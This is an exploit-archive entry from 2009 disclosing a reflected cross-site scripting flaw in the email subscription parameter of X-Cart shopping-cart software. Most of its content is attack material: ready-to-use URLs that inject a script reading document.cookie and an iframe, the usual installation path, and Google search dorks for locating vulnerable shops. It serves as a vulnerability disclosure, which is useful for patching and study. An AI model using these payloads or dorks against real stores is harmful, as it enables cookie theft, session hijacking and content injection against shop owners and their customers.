X-Cart email subscription xss

2009-10-05T00:00:00
ID 1337DAY-ID-9878
Type zdt
Reporter Paulo Santos
Modified 2009-10-05T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================
X-Cart email subscription xss
=============================

## X-Cart XSS in email subscription ##
 
## Download: http://www.x-cart.com/ ##
 
## Discovered by: Paulo Santos ##

http://target/[path]/customer/home.php?mode=subscribed&email=<plaintext/>
http://target/[path]/customer/home.php?mode=subscribed&email=<script>alert(document.cookie);//<</script>
http://target/[path]/customer/home.php?mode=subscribed&email=<iframe src=http://www.google.com.br width=800>
 
Path is usually /xcart/
 
Google dork:
inurl:xcart/customer/
inurl:xcart/customer/home.php
"X-CART. Powerful PHP shopping cart software"



#  0day.today [2018-03-13]  #